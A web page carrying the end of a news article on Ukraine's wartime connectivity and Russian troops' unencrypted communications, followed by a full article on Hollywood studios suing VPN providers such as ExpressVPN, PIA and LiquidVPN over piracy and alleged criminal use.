Russia’s attempts to knock out mobile and internet connections in Ukraine have mired their own communications. Their encrypted radio platform, Era, has been unreliable, leading Russian soldiers to opt for unencrypted platforms. Numerous outlets have reported details of conversations between Russians troops, their commanders, and their families—some even admitting to possible war crimes over unencrypted channels.

While Fedorov’s reform mission has played a large role in modernizing Ukraine, support from the West has certainly helped. SpaceX and the United States have sent some 5,000 Starlink terminals. Fedorov says the European Union has provided some 10 million euros toward computer systems and workstations.

Asked what Ukraine needs as the war wears into its third month, Fedorov mentions satellite equipment, including more Starlink terminals, as well as laptops, tablets, and other tools “to put our civilian infrastructure back online.” He also jokes: “Let's say that the most surefire way to keep us online for a very long time to come is to provide us with artillery, tanks, and warplanes—because that will effectively end the war. And that will remove the problem altogether.”

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Ukraine’s Digital Battle With Russia Isn’t Going as Expected

Beyond accusations of rampant user copyright infringement, film companies have begun accusing VPNs of enabling a slew of more serious illegal activity.

A group of over two dozen film studios has repeatedly taken popular VPN providers to court, sometimes extracting judgements worth millions of dollars in damages. While piracy remains the central issue, recent legal arguments employed by Hollywood studios have surpassed accusations of copyright infringement and delved into dirtier waters.

Filmmakers attempting to recoup revenue lost to piracy have long alleged that VPN companies both encourage online privacy and have clear-cut evidence that their customers are abusing the privacy and security provided by virtual private networks. But court records show that studios’ legal teams have also accused VPN providers of enabling illegal activity far beyond copyright infringement and, legal experts say, are challenging the notion that VPNs should exist at all.

In March, 26 film companies brought allegations against ExpressVPN and Private Internet Access (PIA), popular “no-log” VPN companies owned by Kape Technologies. The plaintiffs include production companies like Millennium, Voltage, and others behind a slate of popular films. The lawsuit centers on allegations of user privacy. However, court documents reviewed by WIRED reveal plaintiffs arguing that these VPN providers refuse to prevent users from using their services to commit serious illegal acts and run marketing campaigns that openly “boast” that law enforcement is unable to extract any information about their users.

Generally speaking, VPNs give users greater privacy protections by encrypting their online activity and rerouting it through the company’s servers, concealing their IP addresses. Many VPN providers, including ExpressVPN and PIA, claim to maintain “no logs” of their users’ internet activities. This means VPN providers can’t access data to turn over to police or comply with copyright infringement claims. Similar to arguments against comprehensive encryption, the film companies paint VPN providers as culpable in any crimes committed while using their services.

“Emboldened by Defendants’ promises that their identities cannot be disclosed, Defendants’ end users use their VPN services not only to engage in widespread movie piracy, but other outrageous criminal conduct such as harassment, illegal hacking and murder,” reads the lawsuit, filed in US District Court in Colorado. “When these crimes become public, Defendants use these tragic incidents as opportunities to boast about their VPN services.”

The VPN companies responded in court filings that the “inflammatory topics” plaintiffs evoked are irrelevant to copyright infringement. Allegations as far afield as “hacking, stalking, bomb threats, political assassinations, child pornography, and anonymous online message board posts full of hate speech and appearing to encourage violence and murder” are a ploy to portray the VPNs in “a cruelly derogatory light," argue the VPNs’ legal teams.

Beyond vague examples of heinous crimes, the court filing mentions an Express VPN subscriber admitting to downloading child sexual abuse material (CSAM). The film companies also call out the personal political views or activities of those employed by the VPN companies. Specifically, they focus on Rick Falkvinge, who’s known for his political views and arguments that CSAM should be legal. Falkvinge is PIA’s Head of Privacy and creator of the political Pirate Party. He has repeatedly advocated for reforms to copyright laws, calling “copying and sharing” a “natural right.”

PIA’s attorney argues that these allegations must be stricken from the case because they are completely irrelevant and “serve only to inflame emotions in a misguided attempt to prejudice the Court and the public against the defendants by false association with the non-parties whose conduct is described in these paragraphs.”

ExpressVPN and PIA further denied these allegations in statements to WIRED. An ExpressVPN spokesperson also emphasized that the “operation of ExpressVPN’s service has not been changed or otherwise impacted in any way relevant to the parties’ dispute.”

PIA maintained that this litigation jeopardizes user privacy and that it will therefore keep fighting in court. “We assert that the use of VPNs is a legitimate way to protect one’s online privacy—a fundamental human right, which is increasingly in jeopardy of infringement,” the company said.

Legal counsel representing the movie studios did not respond to WIRED’s request for comment.

While Hollywood has waged legal battles around the globe for years, its fights against the VPN industry in the US ramped up last year. VPN company TorGuard, for example, landed in legal hot water with the same group of plaintiffs who successfully forced the VPN provider into blocking BitTorrent traffic for its US users. And in October 2021, VPN.ht also “settled” with these filmmakers, agreeing to not only block BitTorrent but also to log traffic on its US servers. Hollywood studios have also taken providers like Surfshark, VPN Unlimited, and Zenmate to court.

Film company Voltage, which is among the group of companies regularly suing VPN providers, goes a step further, mailing letters to internet customers demanding fines for alleged piracy and threatening them with legal action.

In March 2021, some of the same production companies suing ExpressVPN and PIA also sued no-log VPN provider LiquidVPN for “encouraging and facilitating” piracy. Later, the film companies demanded $10 million in damages from the company. A judge issued a default judgment against LiquidVPN this March, ordering it to pay the studios $14 million.

That lawsuit largely centered around LiquidVPN’s fiery marketing practices and claimed that the VPN is “optimized for torrenting” and lets you “unblock ISP banned streams.” These tactics, the studios argued, encouraged illicit use of the service by those willing to bypass legal restrictions around accessing online content. They might be right.

According to the Electronic Frontier Foundation (EFF), an internet civil liberties group, Hollywood’s demands are “extreme and not supported by law.” But VPNs are also treading into dangerous territory through their marketing tactics.

“The studios argued that a VPN provider _and its hosting company_ should have had a legal responsibility to monitor what their customers were doing with the service, to see if copyright infringement was going on,” says Mitch Stoltz, a senior staff attorney at EFF. “Not only is that not the law, it would undermine the whole purpose of a VPN service, which is to protect people’s internet communications against eavesdropping.” 

Stoltz warns, however, that bold marketing language used by VPNs, such as LiquidVPN’s “optimized for torrenting” claim, can very well be considered “inducement” in a legal context and incur liability for copyright infringement. Fearing the possibility of heavy monetary damages, VPN providers may instead choose to shut down some of their services or settle out of court.

“In contrast, a VPN that doesn’t advertise or encourage infringing uses generally won’t be liable in court even if some users do infringe,” says Stoltz. “That’s an important legal protection for VPN providers, who provide an important service that would be undermined if they were faced with broad monitoring and blocking requirements.”

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Tag

#wifi